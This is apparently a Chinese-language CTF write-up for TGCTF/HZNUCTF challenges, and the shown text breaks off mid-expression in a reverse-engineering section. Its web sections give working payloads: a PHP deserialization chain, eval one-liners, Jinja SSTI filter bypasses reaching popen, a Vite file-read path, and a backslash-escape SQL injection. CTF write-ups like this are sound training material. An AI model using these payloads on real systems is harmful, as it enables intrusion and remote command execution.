WEB 火眼辩魑魅 robots.txt找到几个文件,但是只有tgshell.php是可用文件,直接蚁剑连马找到flag
TGCTF{0f65fdf9-a7f6-f15b-43ff-8bca87267f2b}
TG_wordpress 在网上搜wordpress漏洞,运气好,翻文章试了一下编号,对了
TGCTF{CVE-2020-25213}
什么文件上传? 先看robots.txt,找到class.php,源码如下
<?php highlight_file (__FILE__ ); error_reporting (0 ); function best64_decode ($str { return base64_decode (base64_decode (base64_decode (base64_decode (base64_decode ($str ))))); } class yesterday public $learn ; public $study ="study" ; public $try ; public function __construct ( { $this ->learn = "learn<br>" ; } public function __destruct ( { echo "You studied hard yesterday.<br>" ; return $this ->study->hard (); } } class today public $doing ; public $did ; public $done ; public function __construct ( $this ->did = "What you did makes you outstanding.<br>" ; } public function __call ($arg1 , $arg2 { $this ->done = "And what you've done has given you a choice.<br>" ; echo $this ->done; if (md5 (md5 ($this ->doing))==666 ){ return $this ->doing (); } else { return $this ->doing->better; } } } class tommoraw public $good ; public $bad ; public $soso ; public function __invoke ( $this ->good="You'll be good tommoraw!<br>" ; echo $this ->good; } public function __get ($arg1 $this ->bad="You'll be bad tommoraw!<br>" ; } } class future private $impossible ="How can you get here?<br>" ; private $out ; private $no ; public $useful1 ;public $useful2 ;public $useful3 ;public $useful4 ;public $useful5 ;public $useful6 ;public $useful7 ;public $useful8 ;public $useful9 ;public $useful10 ;public $useful11 ;public $useful12 ;public $useful13 ;public $useful14 ;public $useful15 ;public $useful16 ;public $useful17 ;public $useful18 ;public $useful19 ;public $useful20 ; public function __set ($arg1 , $arg2 if ($this ->out->useful7) { echo "Seven is my lucky number<br>" ; system ('whoami' ); } } public function __toString ( echo "This is your future.<br>" ; system ($_POST ["wow" ]); return "win" ; } public function __destruct ( $this ->no = "no" ; return $this ->no; } } if (file_exists ($_GET ['filename' ])){ echo "Focus on the previous step!<br>" ; } else { $data =substr ($_GET ['filename' ],0 ,-4 ); unserialize (best64_decode ($data )); } ?>
创建yesterday对象,其study属性为today对象,today的doing属性为future对象。当反序列化时,yesterday的析构方法调用study->hard(),触发today的__call方法,在计算md5时将doing(future对象)转换为字符串,触发__toString执行命令。
exp如下
<?php class yesterday public $study ; public function __construct ( $this ->study = new today (); } } class today public $doing ; public function __construct ( $this ->doing = new future (); } } class future $y = new yesterday ();echo serialize ($y );?>
结果五次base64加密后为Vm10b2QyUnJOVlpQV0VKVVlXeGFhRll3VlRCa01XUnpZVVYwYUUxWGVGcFpWRXB6VlVkR2NsWlVTbUZXUlRWUFZHMXpNVlpYU1hsaVIzQk9UVlZzTkZZeWRHOWpiVVpXVDBoa1VGSkdjRkJXYTJNMVkwWndSbGw2Vm1oTlYzaGFXVlJLYzFWSFJuSldWRXBoVmtVMVQxUnRjekZXVjBsNVlrZEdVMlZ0ZUROWFZ6QjRZVzFHVms5SVpGQlNSbkJRV1Zjd05XTkdaSFJPVm1ST1VqRktXbFV5TVRSVGJVWjBUMVJPVlUxcVZYZFVNV1JoVjFVeFJVMUVNRDA9
payload如下
GET:filename=Vm10b2QyUnJOVlpQV0VKVVlXeGFhRll3VlRCa01XUnpZVVYwYUUxWGVGcFpWRXB6VlVkR2NsWlVTbUZXUlRWUFZHMXpNVlpYU1hsaVIzQk9UVlZzTkZZeWRHOWpiVVpXVDBoa1VGSkdjRkJXYTJNMVkwWndSbGw2Vm1oTlYzaGFXVlJLYzFWSFJuSldWRXBoVmtVMVQxUnRjekZXVjBsNVlrZEdVMlZ0ZUROWFZ6QjRZVzFHVms5SVpGQlNSbkJRV1Zjd05XTkdaSFJPVm1ST1VqRktXbFV5TVRSVGJVWjBUMVJPVlUxcVZYZFVNV1JoVjFVeFJVMUVNRDA9.php POST:wow=tac /flag
TGCTF{e7ca9e0f-b86c-21cc-595d-27ac5d768611}
AAA偷渡阴平 tgctf2025=eval(end(current(get_defined_vars())));&flag=system('tac /flag');
TGCTF{5b419c90-6274-341f-ad9f-87c6af076d86}
直面天命 爆破找到路由/aazz,通过arjun找到参数名filename,filename=../../app.py获得源码如下
import osimport stringfrom flask import Flask, request, render_template_string, jsonify, send_from_directoryfrom a.b.c.d.secret import secret_keyapp = Flask(__name__) black_list = ['{' , '}' , 'popen' , 'os' , 'import' , 'eval' , '_' , 'system' , 'read' , 'base' , 'globals' ] def waf (name ): for x in black_list: if x in name.lower(): return True return False def is_typable (char ): typable_chars = string.ascii_letters + string.digits + string.punctuation + string.whitespace return char in typable_chars @app.route('/' def home (): return send_from_directory('static' , 'index.html' ) @app.route('/jingu' , methods=['POST' ] def greet (): template1 = "" template2 = "" name = request.form.get('name' ) template = f'{name} ' if waf(name): template = '想干坏事了是吧hacker?哼,还天命人,可笑,可悲,可叹\nImage' else : k = 0 for i in name: if is_typable(i): continue k = 1 break if k == 1 : if not (secret_key[:2 ] in name and secret_key[2 :]): template = '连“六根”都凑不齐,谈什么天命不天命的,还是戴上这金箍吧\n\n再去西行历练历练\n\nImage' return render_template_string(template) template1 = "“六根”也凑齐了,你已经可以直面天命了!我帮你把“secret_key”替换为了“{{}}”\n最后,如果你用了cat,就可以见到齐天大圣了\n" template = template.replace("直面" , "{{" ).replace("天命" , "}}" ) if "cat" in template: template2 = '\n或许你这只叫天命人的猴子,真的能做到?\n\nImage' try : return template1 + render_template_string(template) + render_template_string(template2) except Exception as e: error_message = f"500报错了,查询语句如下:\n{template} " return error_message, 400 @app.route('/hint' , methods=['GET' ] def hinter (): template = "hint:\n有一个由4个小写英文字母组成的路由,去那里看看吧,天命人!" return render_template_string(template) @app.route('/aazz' , methods=['GET' ] def finder (): filename = request.args.get('filename' , '' ) if filename == "" : return send_from_directory('static' , 'file.html' ) if not filename.replace('_' , '' ).isalnum(): content = jsonify({'error' : '只允许字母和数字!' }), 400 if os.path.isfile(filename): try : with open (filename, 'r' ) as file: content = file.read() return content except Exception as e: return jsonify({'error' : str (e)}), 500 else : return jsonify({'error' : '路径不存在或者路径非法' }), 404 if __name__ == '__main__' : app.run(host='0.0.0.0' , port=80 )
非预期 但是尝试读了下flag,直接就出flag
预期 过滤了'{', '}', 'popen', 'os', 'import', 'eval', '_', 'system', 'read', 'base', 'globals',尝试旁路注入,注意[]和()
GET:a=__globals__&b=os&c=popen&d=cat /flag&e=read POST:name=直面(lipsum[request.args.a][request.args.b][request.args.c](request.args.d)[request.args.e]())天命
TGCTF{8a6e0ac3-f5bc-e640-ad0e-32970c8b0ac8}
直面天命(复仇) import osimport stringfrom flask import Flask, request, render_template_string, jsonify, send_from_directoryfrom a.b.c.d.secret import secret_keyapp = Flask(__name__) black_list=['lipsum' ,'|' ,'%' ,'{' ,'}' ,'map' ,'chr' , 'value' , 'get' , "url" , 'pop' ,'include' ,'popen' ,'os' ,'import' ,'eval' ,'_' ,'system' ,'read' ,'base' ,'globals' ,'_.' ,'set' ,'application' ,'getitem' ,'request' , '+' , 'init' , 'arg' , 'config' , 'app' , 'self' ] def waf (name ): for x in black_list: if x in name.lower(): return True return False def is_typable (char ): typable_chars = string.ascii_letters + string.digits + string.punctuation + string.whitespace return char in typable_chars @app.route('/' def home (): return send_from_directory('static' , 'index.html' ) @app.route('/jingu' , methods=['POST' ] def greet (): template1="" template2="" name = request.form.get('name' ) template = f'{name} ' if waf(name): template = '想干坏事了是吧hacker?哼,还天命人,可笑,可悲,可叹 Image' else : k=0 for i in name: if is_typable(i): continue k=1 break if k==1 : if not (secret_key[:2 ] in name and secret_key[2 :]): template = '连“六根”都凑不齐,谈什么天命不天命的,还是戴上这金箍吧 再去西行历练历练 Image' return render_template_string(template) template1 = "“六根”也凑齐了,你已经可以直面天命了!我帮你把“secret_key”替换为了“{{}}” 最后,如果你用了cat,就可以见到齐天大圣了" template= template.replace("天命" ,"{{" ).replace("难违" ,"}}" ) template = template if "cat" in template: template2 = ' 或许你这只叫天命人的猴子,真的能做到? Image' try : return template1+render_template_string(template)+render_template_string(template2) except Exception as e: error_message = f"500报错了,查询语句如下:{template} " return error_message, 400 @app.route('/hint' , methods=['GET' ] def hinter (): template="hint: 有一个aazz路由,去那里看看吧,天命人!" return render_template_string(template) @app.route('/aazz' , methods=['GET' ] def finder (): with open (__file__, 'r' ) as f: source_code = f.read() return f" {source_code} " , 200 , {'Content-Type' : 'text/html; charset=utf-8' }if __name__ == '__main__' : app.run(host='0.0.0.0' , port=80 )
过滤了'lipsum','|','%','{','}','map','chr', 'value', 'get', "url", 'pop','include','popen','os','import','eval','_','system','read','base','globals','_.','set','application','getitem','request', '+', 'init', 'arg', 'config', 'app', 'self'
可将下划线十六进制绕过,然后将关键字用双引号隔开就行
name=天命""["\x5f\x5fcla""ss\x5f\x5f"]["\x5f\x5fba""se\x5f\x5f"]["\x5f\x5fsubclasses\x5f\x5f"]()[132]["\x5f\x5fin""it\x5f\x5f"]["\x5f\x5fglo""bals\x5f\x5f"]["po""pen"]("tac tgffff11111aaaagggggggg")["re""ad"]()难违
官方payload为
name=天命[]["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fmro\x5f\x5f"][1]["\x5f\x5fsubclasses\x5f\x5f"]()[351]('cat /flag',shell=True,stdout=-1).communicate()[0].strip()难违
TGCTF{b22934ef-6827-10e2-9e97-a401837b38ce}
前端GAME 参考CVE-2025-31486 Vite开发服务器任意文件读取漏洞复现-CSDN博客 ,尝试找根目录没结果,最后在环境变量找到flag
/proc/self/environ?.svg?.wasm?init
TGCTF{d17f2dc0-347d-7be4-ca0e-9795c0199224}
前端GAME Plus 一样的payload
/proc/self/environ?.svg?.wasm?init
就能成功获得flag
TGCTF{611d651b-1471-bc27-79f8-de04fc131b45}
后台管理系统 from flask import Flask, request, redirect, render_template, render_template_stringimport pymysql.cursorsimport osdef db (): return pymysql.connect( host=os.environ["MYSQL_HOST" ], user=os.environ["MYSQL_USER" ], password=os.environ["MYSQL_PASSWORD" ], database=os.environ["MYSQL_DATABASE" ], charset="utf8mb4" , cursorclass=pymysql.cursors.DictCursor, ) app = Flask(__name__) @app.get("/" def index (): if "username" not in request.cookies: return redirect("/login" ) return render_template("index.html" , username=request.cookies["username" ]) @app.route("/login" , methods=["GET" , "POST" ] def login (): if request.method == "POST" : username = request.form.get("username" ) password = request.form.get("password" ) if username is None or password is None : return "要输入账号密码喔~" , 400 if len (username) > 64 or len (password) > 64 : return "哈~太长了,受不了了~" , 400 if "'" in username or "'" in password: return "杂鱼,还想SQL注入?爬!" , 400 //过滤字段中单引号 conn = None try : conn = db() with conn.cursor() as cursor: cursor.execute( f"SELECT * FROM users WHERE username = '{username} ' AND password = '{password} '" ) user = cursor.fetchone() except Exception as e: return f"Error: {e} " , 500 finally : if conn is not None : conn.close() if user is None or "username" not in user: return "账号密码错误" , 400 response = redirect("/" ) response.set_cookie("username" , user["username" ]) return response else : return render_template("login.html" )
由于将单引号过滤,所以将username传入\,转义一个单引号,在sql语句中,是最近的两个单引号进行闭合,在转义后构造为如下语句
username= \& password= union select 1 ,2 # SELECT * FROM users WHERE username = '\' AND password = 'union select 1,2#' 此时第一个和第三个单引号闭合,第四个单引号被注释,就可以通过password传入字段进行注入 username= \& password= union select * ,2 from flag#
MISC next is the end
vs一把梭
flag{so_great}
TeamGipsy&ctfer 要重置密码,开机的时候一直按住shirt就行,跟着文章 操作,进入命令行后,查看桌面的mimi.txt,发现启动了docker
docker start TeamGipsyctf2 docker exec -it TeamGipsyctf2 /bin/bash mysql -u root -p password_is_me show databaes; use TeamGipsy; show tables; select * from TG;
HZNUCTF{0H!_YOu_are_really_the_TeamGipsy_ctfer}
Where_it_is(osint) 谷歌识图
然后访问旁边的台湾百事通
站台名为港墘
你的运气是好是坏? 从题目给的好运来以及说flag是1-99999999中的一个数字可以得出一个梗,也就是114514
RE Base64 放IDA获得伪代码然后丢ai一把梭
table = "GLp/+Wn7uqX8FQ2JDR1c0M6U53sjBwyxglmrCVdSThAfEOvPHaYZNzo4ktK9iebI" encoded_str = "AwLdOEVEhIWtajB2CbCWCbTRVsFFC8hirfiXC9gWH9HQayCJVbB8CIF=" encoded = encoded_str.rstrip('=' ) indices = [table.index(c) for c in encoded] x_values = [(i - 24 ) % 64 for i in indices] while len (x_values) % 4 != 0 : x_values.append(0 ) bytes_list = [] for i in range (0 , len (x_values), 4 ): group = x_values[i:i+4 ] if len (group) < 4 : group += [0 ] * (4 - len (group)) b1 = (group[0 ] << 2 ) | (group[1 ] >> 4 ) b2 = ((group[1 ] & 0x0F ) << 4 ) | (group[2 ] >> 2 ) b3 = ((group[2 ] & 0x03 ) << 6 ) | group[3 ] bytes_list.extend([b1, b2, b3]) flag_part = bytes (bytes_list[:-1 ]) flag = flag_part.decode('latin1' ) print (flag)
HZNUCTF{ad162c-2d94-434d-9222-b65dc76a32}
蛇年的本命语言 按照这个的方法 获得pyc文件,网站 反编译获得源码如下
from collections import Counterprint ('Welcome to HZNUCTF!!!' )print ('Plz input the flag:' )ooo0oOoooOOO0 = input () oOO0OoOoo000 = Counter(ooo0oOoooOOO0) O0o00 = '' .join((lambda .0 : for oOooo0OOO in .0 : str (oOO0OoOoo000[oOooo0OOO]))(ooo0oOoooOOO0))print ('ans1: ' , '' , **('end' ,))print (O0o00)if O0o00 != '111111116257645365477364777645752361' : print ('wrong_wrong!!!' ) exit(1 ) iiIII = '' for oOooo0OOO in ooo0oOoooOOO0: if oOO0OoOoo000[oOooo0OOO] > 0 : iiIII += oOooo0OOO + str (oOO0OoOoo000[oOooo0OOO]) oOO0OoOoo000[oOooo0OOO] = 0 i11i1Iii1I1 = (lambda .0 : [ ord (oOooo0OOO) for oOooo0OOO in .0 ])(iiIII) ii1iIi1i11i = [ 7 * i11i1Iii1I1[0 ] == 504 , 9 * i11i1Iii1I1[0 ] - 5 * i11i1Iii1I1[1 ] == 403 , (2 * i11i1Iii1I1[0 ] - 5 * i11i1Iii1I1[1 ]) + 10 * i11i1Iii1I1[2 ] == 799 , 3 * i11i1Iii1I1[0 ] + 8 * i11i1Iii1I1[1 ] + 15 * i11i1Iii1I1[2 ] + 20 * i11i1Iii1I1[3 ] == 2938 , (5 * i11i1Iii1I1[0 ] + 15 * i11i1Iii1I1[1 ] + 20 * i11i1Iii1I1[2 ] - 19 * i11i1Iii1I1[3 ]) + 1 * i11i1Iii1I1[4 ] == 2042 , (7 * i11i1Iii1I1[0 ] + 1 * i11i1Iii1I1[1 ] + 9 * i11i1Iii1I1[2 ] - 11 * i11i1Iii1I1[3 ]) + 2 * i11i1Iii1I1[4 ] + 5 * i11i1Iii1I1[5 ] == 1225 , 11 * i11i1Iii1I1[0 ] + 22 * i11i1Iii1I1[1 ] + 33 * i11i1Iii1I1[2 ] + 44 * i11i1Iii1I1[3 ] + 55 * i11i1Iii1I1[4 ] + 66 * i11i1Iii1I1[5 ] - 77 * i11i1Iii1I1[6 ] == 7975 , ((21 * i11i1Iii1I1[0 ] + 23 * i11i1Iii1I1[1 ] + 3 * i11i1Iii1I1[2 ] + 24 * i11i1Iii1I1[3 ] - 55 * i11i1Iii1I1[4 ]) + 6 * i11i1Iii1I1[5 ] - 7 * i11i1Iii1I1[6 ]) + 15 * i11i1Iii1I1[7 ] == 229 , (2 * i11i1Iii1I1[0 ] + 26 * i11i1Iii1I1[1 ] + 13 * i11i1Iii1I1[2 ] + 0 * i11i1Iii1I1[3 ] - 65 * i11i1Iii1I1[4 ]) + 15 * i11i1Iii1I1[5 ] + 29 * i11i1Iii1I1[6 ] + 1 * i11i1Iii1I1[7 ] + 20 * i11i1Iii1I1[8 ] == 2107 , (10 * i11i1Iii1I1[0 ] + 7 * i11i1Iii1I1[1 ] + -9 * i11i1Iii1I1[2 ] + 6 * i11i1Iii1I1[3 ] + 7 * i11i1Iii1I1[4 ] + 1 * i11i1Iii1I1[5 ] + 22 * i11i1Iii1I1[6 ] + 21 * i11i1Iii1I1[7 ] - 22 * i11i1Iii1I1[8 ]) + 30 * i11i1Iii1I1[9 ] == 4037 , (15 * i11i1Iii1I1[0 ] + 59 * i11i1Iii1I1[1 ] + 56 * i11i1Iii1I1[2 ] + 66 * i11i1Iii1I1[3 ] + 7 * i11i1Iii1I1[4 ] + 1 * i11i1Iii1I1[5 ] - 122 * i11i1Iii1I1[6 ]) + 21 * i11i1Iii1I1[7 ] + 32 * i11i1Iii1I1[8 ] + 3 * i11i1Iii1I1[9 ] - 10 * i11i1Iii1I1[10 ] == 4950 , (((13 * i11i1Iii1I1[0 ] + 66 * i11i1Iii1I1[1 ] + 29 * i11i1Iii1I1[2 ] + 39 * i11i1Iii1I1[3 ] - 33 * i11i1Iii1I1[4 ]) + 13 * i11i1Iii1I1[5 ] - 2 * i11i1Iii1I1[6 ]) + 42 * i11i1Iii1I1[7 ] + 62 * i11i1Iii1I1[8 ] + 1 * i11i1Iii1I1[9 ] - 10 * i11i1Iii1I1[10 ]) + 11 * i11i1Iii1I1[11 ] == 12544 , (((23 * i11i1Iii1I1[0 ] + 6 * i11i1Iii1I1[1 ] + 29 * i11i1Iii1I1[2 ] + 3 * i11i1Iii1I1[3 ] - 3 * i11i1Iii1I1[4 ]) + 63 * i11i1Iii1I1[5 ] - 25 * i11i1Iii1I1[6 ]) + 2 * i11i1Iii1I1[7 ] + 32 * i11i1Iii1I1[8 ] + 1 * i11i1Iii1I1[9 ] - 10 * i11i1Iii1I1[10 ]) + 11 * i11i1Iii1I1[11 ] - 12 * i11i1Iii1I1[12 ] == 6585 , ((((223 * i11i1Iii1I1[0 ] + 6 * i11i1Iii1I1[1 ] - 29 * i11i1Iii1I1[2 ] - 53 * i11i1Iii1I1[3 ] - 3 * i11i1Iii1I1[4 ]) + 3 * i11i1Iii1I1[5 ] - 65 * i11i1Iii1I1[6 ]) + 0 * i11i1Iii1I1[7 ] + 36 * i11i1Iii1I1[8 ] + 1 * i11i1Iii1I1[9 ] - 15 * i11i1Iii1I1[10 ]) + 16 * i11i1Iii1I1[11 ] - 18 * i11i1Iii1I1[12 ]) + 13 * i11i1Iii1I1[13 ] == 6893 , ((((29 * i11i1Iii1I1[0 ] + 13 * i11i1Iii1I1[1 ] - 9 * i11i1Iii1I1[2 ] - 93 * i11i1Iii1I1[3 ]) + 33 * i11i1Iii1I1[4 ] + 6 * i11i1Iii1I1[5 ] + 65 * i11i1Iii1I1[6 ] + 1 * i11i1Iii1I1[7 ] - 36 * i11i1Iii1I1[8 ]) + 0 * i11i1Iii1I1[9 ] - 16 * i11i1Iii1I1[10 ]) + 96 * i11i1Iii1I1[11 ] - 68 * i11i1Iii1I1[12 ]) + 33 * i11i1Iii1I1[13 ] - 14 * i11i1Iii1I1[14 ] == 1883 , (((69 * i11i1Iii1I1[0 ] + 77 * i11i1Iii1I1[1 ] - 93 * i11i1Iii1I1[2 ] - 12 * i11i1Iii1I1[3 ]) + 0 * i11i1Iii1I1[4 ] + 0 * i11i1Iii1I1[5 ] + 1 * i11i1Iii1I1[6 ] + 16 * i11i1Iii1I1[7 ] + 36 * i11i1Iii1I1[8 ] + 6 * i11i1Iii1I1[9 ] + 19 * i11i1Iii1I1[10 ] + 66 * i11i1Iii1I1[11 ] - 8 * i11i1Iii1I1[12 ]) + 38 * i11i1Iii1I1[13 ] - 16 * i11i1Iii1I1[14 ]) + 15 * i11i1Iii1I1[15 ] == 8257 , ((((23 * i11i1Iii1I1[0 ] + 2 * i11i1Iii1I1[1 ] - 3 * i11i1Iii1I1[2 ] - 11 * i11i1Iii1I1[3 ]) + 12 * i11i1Iii1I1[4 ] + 24 * i11i1Iii1I1[5 ] + 1 * i11i1Iii1I1[6 ] + 6 * i11i1Iii1I1[7 ] + 14 * i11i1Iii1I1[8 ] - 0 * i11i1Iii1I1[9 ]) + 1 * i11i1Iii1I1[10 ] + 68 * i11i1Iii1I1[11 ] - 18 * i11i1Iii1I1[12 ]) + 68 * i11i1Iii1I1[13 ] - 26 * i11i1Iii1I1[14 ]) + 15 * i11i1Iii1I1[15 ] - 16 * i11i1Iii1I1[16 ] == 5847 , (((((24 * i11i1Iii1I1[0 ] + 0 * i11i1Iii1I1[1 ] - 1 * i11i1Iii1I1[2 ] - 15 * i11i1Iii1I1[3 ]) + 13 * i11i1Iii1I1[4 ] + 4 * i11i1Iii1I1[5 ] + 16 * i11i1Iii1I1[6 ] + 67 * i11i1Iii1I1[7 ] + 146 * i11i1Iii1I1[8 ] - 50 * i11i1Iii1I1[9 ]) + 16 * i11i1Iii1I1[10 ] + 6 * i11i1Iii1I1[11 ] - 1 * i11i1Iii1I1[12 ]) + 69 * i11i1Iii1I1[13 ] - 27 * i11i1Iii1I1[14 ]) + 45 * i11i1Iii1I1[15 ] - 6 * i11i1Iii1I1[16 ]) + 17 * i11i1Iii1I1[17 ] == 18257 , ((((25 * i11i1Iii1I1[0 ] + 26 * i11i1Iii1I1[1 ] - 89 * i11i1Iii1I1[2 ]) + 16 * i11i1Iii1I1[3 ] + 19 * i11i1Iii1I1[4 ] + 44 * i11i1Iii1I1[5 ] + 36 * i11i1Iii1I1[6 ] + 66 * i11i1Iii1I1[7 ] - 150 * i11i1Iii1I1[8 ] - 250 * i11i1Iii1I1[9 ]) + 166 * i11i1Iii1I1[10 ] + 126 * i11i1Iii1I1[11 ] - 11 * i11i1Iii1I1[12 ]) + 690 * i11i1Iii1I1[13 ] - 207 * i11i1Iii1I1[14 ]) + 46 * i11i1Iii1I1[15 ] + 6 * i11i1Iii1I1[16 ] + 7 * i11i1Iii1I1[17 ] - 18 * i11i1Iii1I1[18 ] == 12591 , (((((5 * i11i1Iii1I1[0 ] + 26 * i11i1Iii1I1[1 ] + 8 * i11i1Iii1I1[2 ] + 160 * i11i1Iii1I1[3 ] + 9 * i11i1Iii1I1[4 ] - 4 * i11i1Iii1I1[5 ]) + 36 * i11i1Iii1I1[6 ] + 6 * i11i1Iii1I1[7 ] - 15 * i11i1Iii1I1[8 ] - 20 * i11i1Iii1I1[9 ]) + 66 * i11i1Iii1I1[10 ] + 16 * i11i1Iii1I1[11 ] - 1 * i11i1Iii1I1[12 ]) + 690 * i11i1Iii1I1[13 ] - 20 * i11i1Iii1I1[14 ]) + 46 * i11i1Iii1I1[15 ] + 6 * i11i1Iii1I1[16 ] + 7 * i11i1Iii1I1[17 ] - 18 * i11i1Iii1I1[18 ]) + 19 * i11i1Iii1I1[19 ] == 52041 , ((((((29 * i11i1Iii1I1[0 ] - 26 * i11i1Iii1I1[1 ]) + 0 * i11i1Iii1I1[2 ] + 60 * i11i1Iii1I1[3 ] + 90 * i11i1Iii1I1[4 ] - 4 * i11i1Iii1I1[5 ]) + 6 * i11i1Iii1I1[6 ] + 6 * i11i1Iii1I1[7 ] - 16 * i11i1Iii1I1[8 ] - 21 * i11i1Iii1I1[9 ]) + 69 * i11i1Iii1I1[10 ] + 6 * i11i1Iii1I1[11 ] - 12 * i11i1Iii1I1[12 ]) + 69 * i11i1Iii1I1[13 ] - 20 * i11i1Iii1I1[14 ] - 46 * i11i1Iii1I1[15 ]) + 65 * i11i1Iii1I1[16 ] + 0 * i11i1Iii1I1[17 ] - 1 * i11i1Iii1I1[18 ]) + 39 * i11i1Iii1I1[19 ] - 20 * i11i1Iii1I1[20 ] == 20253 , (((((((45 * i11i1Iii1I1[0 ] - 56 * i11i1Iii1I1[1 ]) + 10 * i11i1Iii1I1[2 ] + 650 * i11i1Iii1I1[3 ] - 900 * i11i1Iii1I1[4 ]) + 44 * i11i1Iii1I1[5 ] + 66 * i11i1Iii1I1[6 ] - 6 * i11i1Iii1I1[7 ] - 6 * i11i1Iii1I1[8 ] - 21 * i11i1Iii1I1[9 ]) + 9 * i11i1Iii1I1[10 ] - 6 * i11i1Iii1I1[11 ] - 12 * i11i1Iii1I1[12 ]) + 69 * i11i1Iii1I1[13 ] - 2 * i11i1Iii1I1[14 ] - 406 * i11i1Iii1I1[15 ]) + 651 * i11i1Iii1I1[16 ] + 2 * i11i1Iii1I1[17 ] - 10 * i11i1Iii1I1[18 ]) + 69 * i11i1Iii1I1[19 ] - 0 * i11i1Iii1I1[20 ]) + 21 * i11i1Iii1I1[21 ] == 18768 , (((((555 * i11i1Iii1I1[0 ] - 6666 * i11i1Iii1I1[1 ]) + 70 * i11i1Iii1I1[2 ] + 510 * i11i1Iii1I1[3 ] - 90 * i11i1Iii1I1[4 ]) + 499 * i11i1Iii1I1[5 ] + 66 * i11i1Iii1I1[6 ] - 66 * i11i1Iii1I1[7 ] - 610 * i11i1Iii1I1[8 ] - 221 * i11i1Iii1I1[9 ]) + 9 * i11i1Iii1I1[10 ] - 23 * i11i1Iii1I1[11 ] - 102 * i11i1Iii1I1[12 ]) + 6 * i11i1Iii1I1[13 ] + 2050 * i11i1Iii1I1[14 ] - 406 * i11i1Iii1I1[15 ]) + 665 * i11i1Iii1I1[16 ] + 333 * i11i1Iii1I1[17 ] + 100 * i11i1Iii1I1[18 ] + 609 * i11i1Iii1I1[19 ] + 777 * i11i1Iii1I1[20 ] + 201 * i11i1Iii1I1[21 ] - 22 * i11i1Iii1I1[22 ] == 111844 , (((((((1 * i11i1Iii1I1[0 ] - 22 * i11i1Iii1I1[1 ]) + 333 * i11i1Iii1I1[2 ] + 4444 * i11i1Iii1I1[3 ] - 5555 * i11i1Iii1I1[4 ]) + 6666 * i11i1Iii1I1[5 ] - 666 * i11i1Iii1I1[6 ]) + 676 * i11i1Iii1I1[7 ] - 660 * i11i1Iii1I1[8 ] - 22 * i11i1Iii1I1[9 ]) + 9 * i11i1Iii1I1[10 ] - 73 * i11i1Iii1I1[11 ] - 107 * i11i1Iii1I1[12 ]) + 6 * i11i1Iii1I1[13 ] + 250 * i11i1Iii1I1[14 ] - 6 * i11i1Iii1I1[15 ]) + 65 * i11i1Iii1I1[16 ] + 39 * i11i1Iii1I1[17 ] + 10 * i11i1Iii1I1[18 ] + 69 * i11i1Iii1I1[19 ] + 777 * i11i1Iii1I1[20 ] + 201 * i11i1Iii1I1[21 ] - 2 * i11i1Iii1I1[22 ]) + 23 * i11i1Iii1I1[23 ] == 159029 , (((520 * i11i1Iii1I1[0 ] - 222 * i11i1Iii1I1[1 ]) + 333 * i11i1Iii1I1[2 ] + 4 * i11i1Iii1I1[3 ] - 56655 * i11i1Iii1I1[4 ]) + 6666 * i11i1Iii1I1[5 ] + 666 * i11i1Iii1I1[6 ] + 66 * i11i1Iii1I1[7 ] - 60 * i11i1Iii1I1[8 ] - 220 * i11i1Iii1I1[9 ]) + 99 * i11i1Iii1I1[10 ] + 73 * i11i1Iii1I1[11 ] + 1007 * i11i1Iii1I1[12 ] + 7777 * i11i1Iii1I1[13 ] + 2500 * i11i1Iii1I1[14 ] + 6666 * i11i1Iii1I1[15 ] + 605 * i11i1Iii1I1[16 ] + 390 * i11i1Iii1I1[17 ] + 100 * i11i1Iii1I1[18 ] + 609 * i11i1Iii1I1[19 ] + 99999 * i11i1Iii1I1[20 ] + 210 * i11i1Iii1I1[21 ] + 232 * i11i1Iii1I1[22 ] + 23 * i11i1Iii1I1[23 ] - 24 * i11i1Iii1I1[24 ] == 2762025 , ((((1323 * i11i1Iii1I1[0 ] - 22 * i11i1Iii1I1[1 ]) + 333 * i11i1Iii1I1[2 ] + 4 * i11i1Iii1I1[3 ] - 55 * i11i1Iii1I1[4 ]) + 666 * i11i1Iii1I1[5 ] + 666 * i11i1Iii1I1[6 ] + 66 * i11i1Iii1I1[7 ] - 660 * i11i1Iii1I1[8 ] - 220 * i11i1Iii1I1[9 ]) + 99 * i11i1Iii1I1[10 ] + 3 * i11i1Iii1I1[11 ] + 100 * i11i1Iii1I1[12 ] + 777 * i11i1Iii1I1[13 ] + 2500 * i11i1Iii1I1[14 ] + 6666 * i11i1Iii1I1[15 ] + 605 * i11i1Iii1I1[16 ] + 390 * i11i1Iii1I1[17 ] + 100 * i11i1Iii1I1[18 ] + 609 * i11i1Iii1I1[19 ] + 9999 * i11i1Iii1I1[20 ] + 210 * i11i1Iii1I1[21 ] + 232 * i11i1Iii1I1[22 ] + 23 * i11i1Iii1I1[23 ] - 24 * i11i1Iii1I1[24 ]) + 25 * i11i1Iii1I1[25 ] == 1551621 , (((((777 * i11i1Iii1I1[0 ] - 22 * i11i1Iii1I1[1 ]) + 6969 * i11i1Iii1I1[2 ] + 4 * i11i1Iii1I1[3 ] - 55 * i11i1Iii1I1[4 ]) + 666 * i11i1Iii1I1[5 ] - 6 * i11i1Iii1I1[6 ]) + 96 * i11i1Iii1I1[7 ] - 60 * i11i1Iii1I1[8 ] - 220 * i11i1Iii1I1[9 ]) + 99 * i11i1Iii1I1[10 ] + 3 * i11i1Iii1I1[11 ] + 100 * i11i1Iii1I1[12 ] + 777 * i11i1Iii1I1[13 ] + 250 * i11i1Iii1I1[14 ] + 666 * i11i1Iii1I1[15 ] + 65 * i11i1Iii1I1[16 ] + 90 * i11i1Iii1I1[17 ] + 100 * i11i1Iii1I1[18 ] + 609 * i11i1Iii1I1[19 ] + 999 * i11i1Iii1I1[20 ] + 21 * i11i1Iii1I1[21 ] + 232 * i11i1Iii1I1[22 ] + 23 * i11i1Iii1I1[23 ] - 24 * i11i1Iii1I1[24 ]) + 25 * i11i1Iii1I1[25 ] - 26 * i11i1Iii1I1[26 ] == 948348 , ((((((97 * i11i1Iii1I1[0 ] - 22 * i11i1Iii1I1[1 ]) + 6969 * i11i1Iii1I1[2 ] + 4 * i11i1Iii1I1[3 ] - 56 * i11i1Iii1I1[4 ]) + 96 * i11i1Iii1I1[5 ] - 6 * i11i1Iii1I1[6 ]) + 96 * i11i1Iii1I1[7 ] - 60 * i11i1Iii1I1[8 ] - 20 * i11i1Iii1I1[9 ]) + 99 * i11i1Iii1I1[10 ] + 3 * i11i1Iii1I1[11 ] + 10 * i11i1Iii1I1[12 ] + 707 * i11i1Iii1I1[13 ] + 250 * i11i1Iii1I1[14 ] + 666 * 